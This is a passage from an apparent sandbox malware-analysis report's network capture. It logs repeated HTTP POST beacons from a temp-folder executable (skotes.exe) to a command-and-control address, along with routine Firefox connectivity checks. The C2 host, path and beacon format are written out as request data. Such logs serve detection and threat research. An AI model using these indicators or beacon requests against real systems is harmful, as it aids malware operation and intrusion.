                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:13.505513906 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5580
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:32.813420057 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:32.912750006 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5599
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:33.296713114 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:33.395386934 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5600
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      61192.168.2.652403185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:36.532450914 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:37.336934090 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:37 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      62192.168.2.652404185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:38.883066893 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:39.610630989 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:39 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      63192.168.2.652406185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:41.304202080 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:42.015500069 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:41 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      64192.168.2.652407185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:43.541996956 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:44.247210979 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:44 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      65192.168.2.652408185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:45.876450062 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:46.585599899 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:46 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      66192.168.2.652409185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:48.116552114 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:48.861665010 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:48 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      67192.168.2.652411185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:50.495234013 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:51.236358881 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:51 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      68192.168.2.652413185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:52.773015976 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:53.513865948 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:53 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      69192.168.2.652415185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:55.147912025 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:55.848320007 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:55 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      70192.168.2.652416185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:57.362716913 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:58.095896006 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:57 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      71192.168.2.652417185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:59.729522943 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.459745884 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:00 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      72192.168.2.652430185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:02.030673027 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:02.839586020 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:02 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      73192.168.2.652431185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:04.478653908 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:05.211401939 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      74192.168.2.652432185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:06.738575935 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
